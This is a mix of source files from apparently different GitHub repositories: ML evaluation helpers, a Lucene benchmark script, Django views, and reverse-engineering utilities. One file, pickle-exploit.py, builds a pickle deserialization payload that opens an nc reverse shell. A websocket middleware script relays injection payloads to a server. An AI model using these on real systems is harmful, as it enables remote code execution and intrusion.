_expect_exact(context, 'DELETE 1', timeout=2)
@then('we see table dropped')
def step_see_table_dropped(context):
"""
Wait to see drop output.
"""
_expect_exact(context, 'DROP TABLE', timeout=2)
@then('we see completions refresh started')
def step_see_refresh_started(context):
"""
Wait to see refresh output.
"""
_expect_exact(context, 'refresh started in the background', timeout=2)
def _expect_exact(context, expected, timeout):
try:
context.cli.expect_exact(expected, timeout=timeout)
except:
# Strip color codes out of the output.
actual = re.sub('\x1b\[[0-9;]*m', '', context.cli.before)
actual = re.sub('\x1b\[(.*)?.{1}', '', actual)
raise Exception('Expected:\n---\n{0}\n---\n\nActual:\n---\n{1}\n---'.format(
expected,
actual))
``` |
{
"source": "johsnows/once-for-all",
"score": 2
} |
#### File: ofa/tutorial/imagenet_eval_helper.py
```python
import os.path as osp
import numpy as np
import math
from tqdm import tqdm
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torch.utils.data
from torchvision import transforms, datasets
from ofa.utils import AverageMeter, accuracy
from ofa.model_zoo import ofa_specialized
from ofa.imagenet_classification.elastic_nn.utils import set_running_statistics
import copy
import random
def evaluate_ofa_resnet_subnet(ofa_net, path, net_config, data_loader, batch_size, device='cuda:0'):
assert 'w' in net_config and 'd' in net_config and 'e' in net_config
assert len(net_config['w']) == 6 and len(net_config['e']) == 18 and len(net_config['d']) == 5
ofa_net.set_active_subnet(w=net_config['w'], d=net_config['d'], e=net_config['e'])
subnet = ofa_net.get_active_subnet().to(device)
calib_bn(subnet, path, 224, batch_size)
top1 = validate(subnet, path, 224, data_loader, batch_size, device)
return top1
def evaluate_ofa_resnet_ensemble_subnet(ofa_net, path, net_config1, net_config2, data_loader, batch_size, device='cuda:0'):
assert 'w' in net_config1 and 'd' in net_config1 and 'e' in net_config1
assert len(net_config1['w']) == 6 and len(net_config1['e']) == 18 and len(net_config1['d']) == 5
ofa_net.set_active_subnet(w=net_config1['w'], d=net_config1['d'], e=net_config1['e'])
subnet1 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet1, path, 224, batch_size)
ofa_net.set_active_subnet(w=net_config2['w'], d=net_config2['d'], e=net_config2['e'])
subnet2 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet2, path, 224, batch_size)
# assert net_config2['r'][0]==net_config1['r'][0]
subnets = []
subnets.append(subnet2)
subnets.append(subnet1)
top1 = ensemble_validate(subnets, path, 224, data_loader, batch_size, device)
return top1
def evaluate_ofa_subnet(ofa_net, path, net_config, data_loader, batch_size, device='cuda:0'):
assert 'ks' in net_config and 'd' in net_config and 'e' in net_config
assert len(net_config['ks']) == 20 and len(net_config['e']) == 20 and len(net_config['d']) == 5
ofa_net.set_active_subnet(ks=net_config['ks'], d=net_config['d'], e=net_config['e'])
subnet = ofa_net.get_active_subnet().to(device)
calib_bn(subnet, path, net_config['r'][0], batch_size)
top1 = validate(subnet, path, net_config['r'][0], data_loader, batch_size, device)
return top1
def evaluate_ofa_ensemble_subnet(ofa_net, path, net_config1, net_config2, data_loader, batch_size, device='cuda:0'):
assert 'ks' in net_config1 and 'd' in net_config1 and 'e' in net_config1
assert len(net_config1['ks']) == 20 and len(net_config1['e']) == 20 and len(net_config1['d']) == 5
ofa_net.set_active_subnet(ks=net_config1['ks'], d=net_config1['d'], e=net_config1['e'])
subnet1 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet1, path, net_config1['r'][0], batch_size)
ofa_net.set_active_subnet(ks=net_config2['ks'], d=net_config2['d'], e=net_config2['e'])
subnet2 = ofa_net.get_active_subnet().to(device)
calib_bn(subnet2, path, net_config2['r'][0], batch_size)
assert net_config2['r'][0]==net_config1['r'][0]
subnets = []
subnets.append(subnet2)
subnets.append(subnet1)
top1 = ensemble_validate(subnets, path, net_config2['r'][0], data_loader, batch_size, device)
return top1
def calib_bn(net, path, image_size, batch_size, num_images=2000):
# print('Creating dataloader for resetting BN running statistics...')
dataset = datasets.ImageFolder(
osp.join(
path,
'train'),
transforms.Compose([
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(brightness=32. / 255., saturation=0.5),
transforms.ToTensor(),
transforms.Normalize(
mean=[
0.485,
0.456,
0.406],
std=[
0.229,
0.224,
0.225]
),
])
)
chosen_indexes = np.random.choice(list(range(len(dataset))), num_images)
sub_sampler = torch.utils.data.sampler.SubsetRandomSampler(chosen_indexes)
data_loader = torch.utils.data.DataLoader(
dataset,
sampler=sub_sampler,
batch_size=batch_size,
num_workers=16,
pin_memory=True,
drop_last=False,
)
# print('Resetting BN running statistics (this may take 10-20 seconds)...')
set_running_statistics(net, data_loader)
def ensemble_validate(nets, path, image_size, data_loader, batch_size=100, device='cuda:0'):
    if 'cuda' in device:
        print('use cuda')
        # rebuild the list so the DataParallel-wrapped / moved modules are actually kept
        nets = [torch.nn.DataParallel(net).to(device) for net in nets]
    else:
        nets = [net.to(device) for net in nets]
data_loader.dataset.transform = transforms.Compose([
transforms.Resize(int(math.ceil(image_size / 0.875))),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
),
])
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss().to(device)
for net in nets:
net.eval()
net = net.to(device)
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
with torch.no_grad():
with tqdm(total=len(data_loader), desc='Validate') as t:
for i, (images, labels) in enumerate(data_loader):
images, labels = images.to(device), labels.to(device)
# compute output
n = len(nets)
output = 0
for i, net in enumerate(nets):
if i == 0:
output =net(images)
else:
output+=net(images)
output = output/n
loss = criterion(output, labels)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, labels, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0].item(), images.size(0))
top5.update(acc5[0].item(), images.size(0))
t.set_postfix({
'loss': losses.avg,
'top1': top1.avg,
'top5': top5.avg,
'img_size': images.size(2),
})
t.update(1)
print('Results: loss=%.5f,\t top1=%.3f,\t top5=%.1f' % (losses.avg, top1.avg, top5.avg))
return top1.avg
def validate(net, path, image_size, data_loader, batch_size=100, device='cuda:0'):
if 'cuda' in device:
net = torch.nn.DataParallel(net).to(device)
else:
net = net.to(device)
data_loader.dataset.transform = transforms.Compose([
transforms.Resize(int(math.ceil(image_size / 0.875))),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
),
])
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss().to(device)
net.eval()
net = net.to(device)
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
with torch.no_grad():
with tqdm(total=len(data_loader), desc='Validate') as t:
for i, (images, labels) in enumerate(data_loader):
images, labels = images.to(device), labels.to(device)
# compute output
output = net(images)
loss = criterion(output, labels)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, labels, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0].item(), images.size(0))
top5.update(acc5[0].item(), images.size(0))
t.set_postfix({
'loss': losses.avg,
'top1': top1.avg,
'top5': top5.avg,
'img_size': images.size(2),
})
t.update(1)
print('Results: loss=%.5f,\t top1=%.1f,\t top5=%.1f' % (losses.avg, top1.avg, top5.avg))
return top1.avg
def evaluate_ofa_specialized(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
def select_platform_name():
valid_platform_name = [
'pixel1', 'pixel2', 'note10', 'note8', 's7edge', 'lg-g8', '1080ti', 'v100', 'tx2', 'cpu', 'flops'
]
print("Please select a hardware platform from ('pixel1', 'pixel2', 'note10', 'note8', 's7edge', 'lg-g8', '1080ti', 'v100', 'tx2', 'cpu', 'flops')!\n")
while True:
platform_name = input()
platform_name = platform_name.lower()
if platform_name in valid_platform_name:
return platform_name
print("Platform name is invalid! Please select in ('pixel1', 'pixel2', 'note10', 'note8', 's7edge', 'lg-g8', '1080ti', 'v100', 'tx2', 'cpu', 'flops')!\n")
def select_netid(platform_name):
platform_efficiency_map = {
'pixel1': {
143: 'pixel1_lat@[email protected]_finetune@75',
132: 'pixel1_lat@[email protected]_finetune@75',
79: 'pixel1_lat@[email protected]_finetune@75',
58: 'pixel1_lat@[email protected]_finetune@75',
40: 'pixel1_lat@[email protected]_finetune@25',
28: 'pixel1_lat@[email protected]_finetune@25',
20: 'pixel1_lat@[email protected]_finetune@25',
},
'pixel2': {
62: 'pixel2_lat@[email protected]_finetune@25',
50: 'pixel2_lat@[email protected]_finetune@25',
35: 'pixel2_lat@[email protected]_finetune@25',
25: 'pixel2_lat@[email protected]_finetune@25',
},
'note10': {
64: 'note10_lat@[email protected]_finetune@75',
50: 'note10_lat@[email protected]_finetune@75',
41: 'note10_lat@[email protected]_finetune@75',
30: 'note10_lat@[email protected]_finetune@75',
22: 'note10_lat@[email protected]_finetune@25',
16: 'note10_lat@[email protected]_finetune@25',
11: 'note10_lat@[email protected]_finetune@25',
8: 'note10_lat@[email protected]_finetune@25',
},
'note8': {
65: 'note8_lat@[email protected]_finetune@25',
49: 'note8_lat@[email protected]_finetune@25',
31: 'note8_lat@[email protected]_finetune@25',
22: 'note8_lat@[email protected]_finetune@25',
},
's7edge': {
88: 's7edge_lat@[email protected]_finetune@25',
58: 's7edge_lat@[email protected]_finetune@25',
41: 's7edge_lat@[email protected]_finetune@25',
29: 's7edge_lat@[email protected]_finetune@25',
},
'lg-g8': {
24: 'LG-G8_lat@[email protected]_finetune@25',
16: 'LG-G8_lat@[email protected]_finetune@25',
11: 'LG-G8_lat@[email protected]_finetune@25',
8: 'LG-G8_lat@[email protected]_finetune@25',
},
'1080ti': {
27: '1080ti_gpu64@[email protected]_finetune@25',
22: '1080ti_gpu64@[email protected]_finetune@25',
15: '1080ti_gpu64@[email protected]_finetune@25',
12: '1080ti_gpu64@[email protected]_finetune@25',
},
'v100': {
11: 'v100_gpu64@[email protected]_finetune@25',
9: 'v100_gpu64@[email protected]_finetune@25',
6: 'v100_gpu64@[email protected]_finetune@25',
5: 'v100_gpu64@[email protected]_finetune@25',
},
'tx2': {
96: 'tx2_gpu16@[email protected]_finetune@25',
80: 'tx2_gpu16@[email protected]_finetune@25',
47: 'tx2_gpu16@[email protected]_finetune@25',
35: 'tx2_gpu16@[email protected]_finetune@25',
},
'cpu': {
17: 'cpu_lat@[email protected]_finetune@25',
15: 'cpu_lat@[email protected]_finetune@25',
11: 'cpu_lat@[email protected]_finetune@25',
10: 'cpu_lat@[email protected]_finetune@25',
},
'flops': {
595: 'flops@[email protected]_finetune@75',
482: 'flops@[email protected]_finetune@75',
389: 'flops@[email protected]_finetune@75',
}
}
sub_efficiency_map = platform_efficiency_map[platform_name]
if not platform_name == 'flops':
print("Now, please specify a latency constraint for model specialization among", sorted(list(sub_efficiency_map.keys())), 'ms. (Please just input the number.) \n')
else:
print("Now, please specify a FLOPs constraint for model specialization among", sorted(list(sub_efficiency_map.keys())), 'MFLOPs. (Please just input the number.) \n')
while True:
efficiency_constraint = input()
if not efficiency_constraint.isdigit():
print('Sorry, please input an integer! \n')
continue
efficiency_constraint = int(efficiency_constraint)
if not efficiency_constraint in sub_efficiency_map.keys():
print('Sorry, please choose a value from: ', sorted(list(sub_efficiency_map.keys())), '.\n')
continue
return sub_efficiency_map[efficiency_constraint]
if not ensemble:
platform_name = select_platform_name()
net_id = select_netid(platform_name)
net, image_size = ofa_specialized(net_id=net_id, pretrained=True)
validate(net, path, image_size, data_loader, batch_size, device)
else:
nets = []
for i in range(2):
print('{}model'.format(i))
platform_name = select_platform_name()
net_id = select_netid(platform_name)
net, image_size = ofa_specialized(net_id=net_id, pretrained=True)
nets.append(net)
ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
return net_id
net_id = ['pixel1_lat@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75',
'pixel1_lat@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75',
'pixel1_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25',
'pixel1_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'pixel2_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'pixel2_lat@[email protected]_finetune@25', 'note10_lat@[email protected]_finetune@75',
'note10_lat@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75',
'note10_lat@[email protected]_finetune@25', 'note10_lat@[email protected]_finetune@25',
'note10_lat@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25',
'note8_lat@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25',
'note8_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25',
'LG-G8_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25',
'LG-G8_lat@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25',
'1080ti_gpu64@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25',
'1080ti_gpu64@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25',
'tx2_gpu16@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25',
'tx2_gpu16@[email protected]_finetune@25', 'cpu_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'cpu_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'flops@[email protected]_finetune@75',
'flops@[email protected]_finetune@75', 'flops@[email protected]_finetune@75', ]
def evaluate_ofa_space(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
net_acc=[]
for i, id in enumerate(net_id):
acc=""
for j in range(2, len(id)):
if id[j]=='.':
acc=id[j-2]+id[j-1]+id[j]+id[j+1]
net_acc.append(acc)
id =np.argsort(np.array(net_acc))
new_net_id = copy.deepcopy(net_id)
for i, sortid in enumerate(id):
new_net_id[i] = net_id[sortid]
print('new_net_id', new_net_id)
n = len(net_id)
best_acc = 0
space = []
best_team =[]
for i in range(1, n):
for j in range(i):
nets = []
team = []
team.append(j)
team.append(i)
net, image_size = ofa_specialized(net_id=new_net_id[j], pretrained=True)
nets.append(net)
net, image_size = ofa_specialized(net_id=new_net_id[i], pretrained=True)
nets.append(net)
acc = ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
if acc>best_acc:
best_acc=acc
best_team = team
print('space {} best_acc{}'.format(i+1, best_acc))
space.append(best_acc)
print('space:{}'.format(space))
return net_id[best_team[0]], net_id[best_team[1]]
def evaluate_ofa_best_acc_team(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
net_acc=[]
for i, id in enumerate(net_id):
acc=""
for j in range(2, len(id)):
if id[j]=='.':
acc=id[j-2]+id[j-1]+id[j]+id[j+1]
net_acc.append(acc)
id =np.argsort(np.array(net_acc))
new_net_id = copy.deepcopy(net_id)
for i, sortid in enumerate(id):
new_net_id[i] = net_id[sortid]
print('new_net_id', new_net_id)
n = len(net_id)
best_acc = 0
space = []
best_team =[]
i = n-1
for j in range(18, n):
nets = []
team = []
team.append(j)
team.append(i)
net, image_size = ofa_specialized(net_id=new_net_id[j], pretrained=True)
nets.append(net)
net, image_size = ofa_specialized(net_id=new_net_id[i], pretrained=True)
nets.append(net)
acc = ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
print('net i:{} netj:{} acc:{}'.format(new_net_id[i], new_net_id[j], acc))
if acc>best_acc:
best_acc=acc
best_team = team
print('space {} best_acc{}'.format(i+1, best_acc))
space.append(best_acc)
print('space:{}'.format(space))
return new_net_id[best_team[0]], new_net_id[best_team[1]]
def evaluate_ofa_random_sample(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
net_acc=[]
for i, id in enumerate(net_id):
acc=""
for j in range(2, len(id)):
if id[j]=='.':
acc=id[j-2]+id[j-1]+id[j]+id[j+1]
net_acc.append(acc)
id =np.argsort(np.array(net_acc))
new_net_id = copy.deepcopy(net_id)
for i, sortid in enumerate(id):
new_net_id[i] = net_id[sortid]
print('new_net_id', new_net_id)
n = len(net_id)
best_acc = 0
acc_list = []
space = []
best_team =[]
for k in range(20):
nets = []
team = []
i = random.randint(0, n-1)
j = (i + random.randint(1, n-1)) % n
print('i:{} j:{}'.format(i, j))
team.append(j)
team.append(i)
net, image_size = ofa_specialized(net_id=new_net_id[j], pretrained=True)
nets.append(net)
net, image_size = ofa_specialized(net_id=new_net_id[i], pretrained=True)
nets.append(net)
acc = ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
print('net i:{} netj:{} acc:{}'.format(new_net_id[i], new_net_id[j], acc))
acc_list.append(acc)
if acc>best_acc:
best_acc=acc
best_team = team
avg_acc = np.mean(acc_list)
std_acc = np.std(acc_list, ddof=1)
var_acc = np.var(acc_list)
print("avg{} var{} std{}".format(avg_acc, std_acc, var_acc))
    print('best_random_team {} best_acc {}'.format(best_team, best_acc))
space.append(best_acc)
print('space:{}'.format(space))
return new_net_id[best_team[0]], new_net_id[best_team[1]]
sort_net_id=['tx2_gpu16@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25',
'note10_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25',
             'cpu_lat@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25',
'tx2_gpu16@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25', 'LG-G8_lat@11ms_to [email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
             'note10_lat@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25', 'cpu_lat@[email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'note8_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25', 'note10_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
'1080ti_gpu64@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@75',
'pixel1_lat@[email protected]_finetune@75', 'flops@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75',
'flops@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75',
'flops@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75']
``` |
{
"source": "johtani/luceneutil",
"score": 2
} |
#### File: src/python/runAnalyzerPerf.py
```python
import datetime
import os
import constants
LUCENE_ROOT = '/l/trunk.analyzers.nightly/lucene'
LOGS_ROOT = os.path.join(constants.LOGS_DIR, 'analyzers')
def run(cmd):
print('RUN: %s' % cmd)
if os.system(cmd):
raise RuntimeError('%s failed' % cmd)
os.chdir(LUCENE_ROOT)
t = datetime.datetime.now()
ymd = t.strftime('%Y-%m-%d')
print('\n%s' % ymd)
#run('python -u /home/mike/src/util/svnClean.py %s/..' % LUCENE_ROOT)
#run('svn cleanup')
#run('svn up')
run('git clean -xfd')
run('git pull origin master')
print('Compile...')
run('ant clean compile > compile.log 2>&1')
logFile = '%s/%s.log' % (LOGS_ROOT, ymd)
with open(logFile + '.tmp', 'w') as lf:
#lf.write('svnversion: %s\n' % os.popen('svnversion').read().strip())
lf.write('lucene master version: %s\n' % os.popen('git rev-parse HEAD').read().strip())
os.chdir(constants.BENCH_BASE_DIR)
lf.write('git version: %s\n' % os.popen('git rev-parse HEAD').read().strip())
lf.write('java version: %s\n' % os.popen('java -fullversion 2>&1').read().strip())
os.chdir(LUCENE_ROOT)
run('javac -d %s/build -cp build/core/classes/java:build/analysis/common/classes/java %s/src/main/perf/TestAnalyzerPerf.java' % (constants.BENCH_BASE_DIR, constants.BENCH_BASE_DIR))
print(' now run')
run('java -XX:+UseParallelGC -cp %s/build:build/core/classes/java:build/analysis/common/classes/java perf.TestAnalyzerPerf /l/data/enwiki-20130102-lines.txt >> %s.tmp 2>&1' % (constants.BENCH_BASE_DIR, logFile))
os.rename(logFile+'.tmp', logFile)
print(' done')
``` |
{
"source": "Johthema/pets",
"score": 2
} |
#### File: pets/core/views.py
```python
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.decorators import login_required
# Create your views here.
from .models import Pet
@login_required(login_url='/login/')
def register_pet(request):
pet_id = request.GET.get('id')
if pet_id:
pet = Pet.objects.get(id=pet_id)
if pet.user == request.user:
return render(request, 'register-pet.html', {'pet':pet})
return render(request, 'register-pet.html')
@login_required(login_url='/login/')
def set_pet(request):
city = request.POST.get('city')
email = request.POST.get('email')
phone = request.POST.get('phone')
description = request.POST.get('description')
photo = request.FILES.get('file')
pet_id = request.POST.get('pet-id')
user = request.user
if pet_id:
pet = Pet.objects.get(id=pet_id)
if user == pet.user:
pet.email = email
pet.phone = phone
pet.city = city
pet.description = description
if photo:
pet.photo = photo
pet.save()
else:
user = request.user
pet = Pet.objects.create(email=email, phone=phone, description=description,
photo=photo, user=user, city=city)
url = '/pet/detail/{}/'.format(pet.id)
return redirect(url)
@login_required(login_url='/login/')
def delete_pet(request, id):
pet = Pet.objects.get(id=id)
if pet.user == request.user:
pet.delete()
return redirect('/')
@login_required(login_url='/login/')
def list_all_pets(request):
pet = Pet.objects.filter(active=True)
return render(request, 'list.html', {'pet':pet})
def list_user_pets(request):
pet = Pet.objects.filter(active=True, user=request.user)
return render(request, 'list.html', {'pet':pet})
def pet_detail(request, id):
pet=Pet.objects.get(active=True, id=id)
return render (request, 'pet.html',{'pet':pet})
def login_user(request):
return render(request, 'login.html')
def logout_user(request):
print(request.user)
logout(request)
return redirect ('/login/')
@csrf_protect
def submit_login(request):
if request.POST:
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect('/')
else:
            messages.error(request, 'Usuario ou senha inválido.')
return redirect('/login/')
``` |
{
"source": "johto89/code-snippets",
"score": 3
} |
#### File: python/crypto/cordova-aes.py
```python
import os
import sys
import glob
import errno
import base64
from Crypto import Random
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key, iv):
self.key = key
self.iv = iv
def encrypt(self, source):
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
padding = AES.block_size - len(source) % AES.block_size
data = source + chr(padding) * padding
return base64.b64encode(cipher.encrypt(data))
def decrypt(self, source):
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
data = cipher.decrypt(base64.b64decode(source))
padding = ord(data[-1])
if data[-padding:] != chr(padding) * padding:
raise ValueError("Invalid padding...")
return data[:-padding]
def makedir(directory):
''' Make a directory. '''
try:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
print("[E] makedir")
if len(sys.argv) < 5 or sys.argv[1] not in ["dec", "enc"]:
print("Usage: python cordova-aes.py <enc/dec> <secret_key> <iv_value> <file(s)>")
sys.exit(1)
action = sys.argv[1]
key = sys.argv[2]
iv = sys.argv[3]
files = sys.argv[4:]
cipher = AESCipher(key, iv)
makedir(action)
if type(files) == str:
files = [files]
for filename in files:
out_path = action + "/" + filename
with open(filename, 'r') as inf:
data = inf.read()
if action == "dec":
data = data.replace('\n', '')
with open(out_path, "w") as f:
f.write(cipher.decrypt(data))
print("[+] Decrypted data have been written into '" + out_path + "'")
elif action == "enc":
with open(out_path, "w") as f:
f.write(cipher.encrypt(data))
print("[+] Encrypted data have been written into '" + out_path + "'")
```
#### File: code-snippets/python/web-socket middleware.py
```python
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection
ws_server = "ws://localhost:8156/ws"
def send_ws(payload):
ws = create_connection(ws_server)
# If the server returns a response on connect, use below line
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
# For our case, format the payload in JSON
message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
data = '{"employeeID":"%s"}' % message
ws.send(data)
resp = ws.recv()
ws.close()
if resp:
return resp
else:
return ''
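# Example of the formatting above (added for illustration, hypothetical value): a request to
# http://localhost:8081/?id=1001 yields the payload "1001", which is wrapped as '{"employeeID":"1001"}'
# before being sent over the websocket; the server's reply is then relayed back as the HTTP response.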
def middleware_server(host_port,content_type="text/plain"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
self.send_response(200)
try:
payload = urlparse(self.path).query.split('=',1)[1]
except IndexError:
payload = False
if payload:
content = send_ws(payload)
else:
content = 'No parameters specified!'
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(content.encode())
return
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()
print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")
try:
middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
pass
``` |
{
"source": "johto89/Google-Hacking-Tool-with-C-",
"score": 3
} |
#### File: johto89/Google-Hacking-Tool-with-C-/pickle-exploit.py
```python
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
'/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
return os.system, (cmd,)
if __name__ == '__main__':
pickled = pickle.dumps(RCE())
print(base64.urlsafe_b64encode(pickled))
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/highlight_all_CALLs.py
```python
from idc import *
from idaapi import *
from idautils import *
def main():
processor_name = GetCharPrm(INF_PROCNAME)
if processor_name == 'metapc':
call_instructions = ['call']
elif processor_name == 'ARM':
call_instructions = ['BL', 'BL.W', 'BX', 'BLX']
else:
print 'Unsupported processor type: %s' % (processor_name)
return
# For each segment
for segment_begin_ea in Segments():
segment_end_ea = SegEnd(segment_begin_ea)
# For each instruction
last_page = 0
for ea in list(Heads(segment_begin_ea, segment_end_ea)):
# Print log if a processing page changed
current_page = (ea & 0xffffffffffff0000)
if last_page != current_page:
last_page = current_page
print('Processing 0x%016X (Range of "%s" is 0x%016X - 0x%016X)' %
(last_page, SegName(current_page), segment_begin_ea,
segment_end_ea)
)
# Set colour if this instruction is any of call instructions
disasm = GetDisasm(ea)
for inst in call_instructions:
if disasm.startswith(inst + ' '):
SetColor(ea, CIC_ITEM, 0xd8bfd8)
if __name__ == '__main__':
main()
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/rotate.py
```python
def _rol(val, bits, bit_size):
return (val << bits % bit_size) & (2 ** bit_size - 1) | \
((val & (2 ** bit_size - 1)) >> (bit_size - (bits % bit_size)))
def _ror(val, bits, bit_size):
return ((val & (2 ** bit_size - 1)) >> bits % bit_size) | \
(val << (bit_size - (bits % bit_size)) & (2 ** bit_size - 1))
__ROR4__ = lambda val, bits: _ror(val, bits, 32)
__ROR8__ = lambda val, bits: _ror(val, bits, 64)
__ROL4__ = lambda val, bits: _rol(val, bits, 32)
__ROL8__ = lambda val, bits: _rol(val, bits, 64)
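# Worked example (added for illustration): rotating the byte 0x81 left by one bit wraps the top bit
# around, i.e. _rol(0x81, 1, 8) == 0x03, and rotating back gives _ror(0x03, 1, 8) == 0x81.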
print('__ROR4__, __ROR8__, __ROL4__ and __ROL8__ were defined.')
print('Try this in the Python interpreter:')
print('hex(__ROR8__(0xD624722D3A28E80F, 0xD6))')
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/show_SEH_chain.py
```python
from idc import *
from idaapi import *
from idautils import *
def GetFsBase(tid):
idc.SelectThread(tid)
return idaapi.dbg_get_thread_sreg_base(tid, cpu.fs)
def GetExceptionChain(tid):
fs_base = GetFsBase(tid)
exc_rr = Dword(fs_base)
result = []
while exc_rr != 0xffffffff:
prev = Dword(exc_rr)
handler = Dword(exc_rr + 4)
print '%6d %08X %08X' % (tid, exc_rr + 4, handler)
exc_rr = prev
result.append(handler)
return result
def main():
print 'TID Address Handler'
curr_tid = idc.GetCurrentThreadId()
result = {}
for tid in idautils.Threads():
result[tid] = GetExceptionChain(tid)
idc.SelectThread(curr_tid)
if __name__=='__main__':
main()
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/visualize_binary.py
```python
import sys
import os
import math
# Third Party
import Image
# Original
def main(arg_values, arg_length):
"""Main routine"""
if arg_length != 2:
help(os.path.splitext(os.path.basename(sys.argv[0]))[0])
return
input_file_name = arg_values[1]
input_file = open(input_file_name, "rb")
input_data = bytearray(input_file.read())
if len(input_data) == 0:
print "Empty file."
return
IMAGE_WIDTH = 128
image_size = (IMAGE_WIDTH,
int(math.ceil(len(input_data) / (IMAGE_WIDTH * 1.0))))
image = Image.new("RGB", image_size, "white")
def convert_color(byte):
"""Decides a pixel color according to the rule of Stirling."""
if byte >= 0x80:
return 0x000000
elif byte >= 0x20:
